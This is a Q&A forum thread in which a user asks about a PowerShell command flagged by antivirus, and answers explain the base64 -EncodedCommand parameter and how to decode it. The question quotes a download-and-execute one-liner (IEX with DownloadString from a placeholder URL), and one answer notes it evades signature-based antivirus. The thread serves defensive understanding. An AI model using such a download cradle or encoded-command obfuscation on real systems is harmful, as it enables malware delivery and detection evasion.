# Suspicious PowerShell Command

Tags: powershell, base64, malware, virus-scanning

My anti virus keeps alerting me with below mentioned powershell command. I'm a bit familiar with Powershell but can't understand what does below powershell script does. Also most importantly I want to know what is "-e" parameter, used in command line

SUSPICIOUS COMMAND LINE:

`powershell -e sqbfafgakaboaguadwatae8aygbqaguaywb0acaatgblahqalgbxaguaygbdagwaaqbl`

SUSPICIOUS SCRIPT:

`IEX(New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')`

Answer (score 7, accepted):

As for the **script**:

`IEX((New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh'))` downloads a *string* from the given URL and tries to *execute it as a PowerShell command*, via `IEX`, the built-in alias for the (generally [to be avoided](https://blogs.msdn.microsoft.com/powershell/2011/06/03/invoke-expression-considered-harmful/)) [`Invoke-Expression`](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression) cmdlet.

In other words: it downloads unknown PowerShell commands from a website and executes them.

---

As for the **command line**:

`-e` is short for the [PowerShell CLI](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe)'s [`-EncodedCommand` parameter](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand), which accepts **commands as [Base64](https://en.wikipedia.org/wiki/Base64)-encoded strings**.

The **purpose of this parameter is to enable robust passing of complex command strings** without running into problems with quoting and escaping.

However, **malware uses the parameter as an *obfuscation* technique**: you cannot easily tell what the command is doing.

---

Example:

```
# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA
```

is the equivalent of:

```
powershell -Command "Get-Date -Format yyyy"
```

You can **decode** a given Base64-encoded argument as follows:

```
$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))
```

Conversely, if you want to **Base64-encode** a string for `-EncodedCommand`:

```
$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
```

Answer (score 0):

it is kind of fileless malware as the IEX command execute in memory without saving to the disk.by that it can avoid some antiviruses that depend on file signature.